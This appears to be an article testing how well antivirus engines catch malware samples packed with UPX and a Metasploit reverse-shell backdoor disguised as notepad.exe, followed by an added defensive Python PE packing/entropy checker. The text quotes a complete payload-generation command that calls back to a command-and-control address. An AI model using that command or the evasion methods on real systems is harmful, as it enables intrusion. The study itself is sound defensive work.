

One of the first techniques that attackers use to avoid antivirus detection is compression. Originally intended to help application developers reduce the size of their program files to ease distribution, compression is used by malware authors to obfuscate the contents of the executable. By using compression techniques, malware authors found they could modify their code in order to bypass signature-based antivirus software.

Many applications can be used for compression, but one of the most popular is called the Ultimate Packer for eXecutables (UPX). It is open source and available from SourceForge. I used this technique against known malware samples to demonstrate the effectiveness of obfuscation through compression. I find it helpful to keep a collection of malware samples that I have encountered over the years to test new defenses and validate detection strategies. I chose two of the most infamous strains of malware in my collection. One is a variant of the Zeus Trojan that came through antivirus systems undetected in May of 2012. The second is a variant of the incredibly successful ransomware that resembles fake antivirus and has been the scourge of IT helpdesks around the world.

Symantec was not alone in reclassifying the type of malware detected. The following lists show that, except for McAfee, most of the well-known antivirus engines also reclassified the malware. McAfee was able to detect the malware despite the modifications, which looked promising. The next test was to verify whether McAfee would do as well with another malware sample. The test results from packing the fake antivirus ransomware were even better than the results achieved with the packed Zeus Trojan. Three more antivirus engines missed detection altogether, raising the total number of misses this time to 15. Symantec turned out to be one of the engines that failed to detect any malware in the packed ransomware executable, but it was certainly not alone, as the tables below illustrate. McAfee and Microsoft both do well in this test. However, this is not to imply that any of these antivirus engines offers “better” protection than any other. The test consisted of only two different files that had been packed using one compression tool. The results could be completely different with different malware samples or compression tools.

This test simply demonstrates that it is possible to bypass antivirus engines using this methodology. There are still plenty of other methods that can be used to bypass all of them.

Packaging Exploits With Penetration-Testing Frameworks

My next test utilized the popular Metasploit Community Edition penetration-testing framework. This tool is well known for its open-contribution development and flexibility. The ability to package exploits or backdoors into files that could be used in penetration tests was a key feature added several years ago. Many popular file formats can be created by this tool, including PDFs and all of the standard Microsoft Office formats. It can also generate executables, which can be templated from default Microsoft Windows program files.

An unsuspecting user is likely to run “notepad.exe” and not realize it has been modified. This is how a penetration tester can evade antivirus engines, and it simulates how malware authors generate realistic-looking malicious code. I ran several standard Microsoft Windows executables through the following command to test the antivirus detection rate:

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe

The command generated a standard reverse TCP backdoor, which would connect to the command and control server at 192.168.1.75 on port 4444. This was piped to the encoder, which ran through five passes using the shikata ga nai encoder. The phrase means “it cannot be helped” in Japanese, but here it refers to the polymorphic XOR additive feedback encoder that Metasploit used to create the executable. The final product, notepad2.exe, was produced by using notepad.exe as a template. The victim would execute notepad2.exe and create a backdoor connection to the C&C server at 192.167.1.75. It was then time to upload and scan notepad2.exe to test the detection capabilities of the same antivirus engines used in the previous tests. This test was a complete miss for every one of the 46 antivirus engines available at. None of them, including Microsoft, Symantec and McAfee, identified the backdoor that was encoded in this file. This was the expected result, and it demonstrates the limitations of signature-based antivirus engines.
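As an added defender-side example (not code from the original article), here is a minimal static check for the two indicators this page's tests rely on: the section names UPX leaves behind in a packed executable, and the near-random byte distribution that compressed or polymorphic XOR-encoded payloads produce. It parses the PE section table with the standard library only; the 7.0 bits-per-byte cut-off and the two inline sample images are constructed assumptions, not real binaries.

```python
import math
import struct
from collections import Counter

UPX_NAMES = {b"UPX0", b"UPX1", b"UPX2"}  # section names the stock UPX stub leaves in place
HIGH_ENTROPY = 7.0                       # assumed cut-off (bits/byte) for compressed or encoded bytes

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) per section header; a minimal parser, no third-party pefile needed."""
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]  # e_lfanew
    if image[:2] != b"MZ" or image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = pe_off + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    for i in range(n_sections):
        hdr = coff + 20 + opt_size + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        yield name, image[raw_ptr:raw_ptr + raw_size]

def packing_indicators(image: bytes) -> dict:
    """Static triage: per-section entropy, UPX section names, and sections above the entropy cut-off."""
    report = {"entropy": {}, "upx_sections": [], "high_entropy_sections": []}
    for name, data in pe_sections(image):
        ent = report["entropy"][name] = round(shannon_entropy(data), 2)
        if name.encode() in UPX_NAMES:
            report["upx_sections"].append(name)
        if ent >= HIGH_ENTROPY:
            report["high_entropy_sections"].append(name)
    report["likely_packed"] = bool(report["upx_sections"] or report["high_entropy_sections"])
    return report

def build_sample_pe(sections) -> bytes:
    """Constructed test image, not a real program: minimal MZ/PE headers followed by the sections."""
    pe_off, ptr = 0x40, 0x40 + 4 + 20 + 40 * len(sections)  # no optional header; data follows the table
    headers, body = b"", b""
    for name, data in sections:
        headers += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0, len(data), ptr) + b"\0" * 16
        body, ptr = body + data, ptr + len(data)
    mz = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    return mz + b"PE\0\0" + coff + headers + body

# Constructed samples: low-entropy code/data versus UPX-named sections whose UPX1 body is a uniform
# byte distribution (entropy 8.0), which is what a compressed or XOR-encoded payload approximates.
SAMPLE_PLAIN = build_sample_pe([(b".text", b"\x90" * 512 + b"\xc3"), (b".data", b"hello" * 100)])
SAMPLE_PACKED = build_sample_pe([(b"UPX0", b""), (b"UPX1", bytes(range(256)) * 16)])
```

Entropy is a triage signal rather than a verdict, since legitimate installers and embedded resources are often compressed too; pair it with the section names and with monitoring of what the process does after it unpacks, such as the outbound connection the backdoor above makes.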
